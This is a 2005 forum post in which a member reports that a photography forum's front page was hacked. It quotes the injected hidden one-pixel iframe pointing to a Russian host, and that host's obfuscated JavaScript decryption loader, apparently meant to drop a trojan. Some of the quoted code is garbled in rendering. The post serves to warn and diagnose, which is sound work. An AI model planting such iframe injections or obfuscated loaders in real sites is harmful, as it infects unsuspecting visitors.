|
francois
|
 |
« Reply #8 on: November 20, 2005, 01:03:53 PM » |
Reply
|
In the list of forums on the main page, the text for the first one (nature photography) has apparently been hacked so it's followed by an iframe tag with src=" http://www.pbt.com.ru/petroboard/board/index.php" width="1" height="1" which apparently tries to load some trojan stuff. [a href=\"index.php?act=findpost&pid=51785\"][{POST_SNAPBACK}][/a] If I load the offending url, Safari (on the Mac) closes the window immediately. Using curl shows the hacked source leading to the Russian address. "Hacked" LL forum source:<td class="row2"><b><a href="http://luminous-landscape.com/forum/index.php?amp;showforum=1">Landscape & Nature Photography</a></b><br /><span class="forumdesc">Nature Photography ? technical and esthetic issues<iframe src="http://www.pbt.com.ru/petroboard/board/index.php" width="1" height="1"<br /><br /><i></i></span></td>
"Russian" page source:<script language=JavaScript> function decrypt_p(x) {var l=x.length,b=1024,i,j,r,p=0,s=0,w=0, t=Array(63,58,7,61,18,40,43,41,34,6,0,0,0,0,0,0,25,22,31,49,36,26,16,5,47,50,57, 45,14,33,15,8,12,2,20,27,53,30,42,9,0,1,29,0,0,0,0,48,0,54,60,59,28,10,35,55,62,3 9,3,21,52,4,38,24,13,17,23,37,51,19,44,11,32,46,56);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,;i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write®}}decrypt_p("Gn7CXHdlXB3n@Ubnb6PlGIU3GIvTGUdIeSvtX2PMm4oneUbn@V5CXHdlXB3n@EKCrtdTqroImHv _Fuv_XfJtmNpCASbTPrZlGE3T9f7xWtbCeEdIeSp_whvTQy@neEKCrtdTqHW") </script>
|
|
|
|
« Last Edit: November 20, 2005, 01:12:39 PM by francois »
|
Logged
|
Francois
|
|
|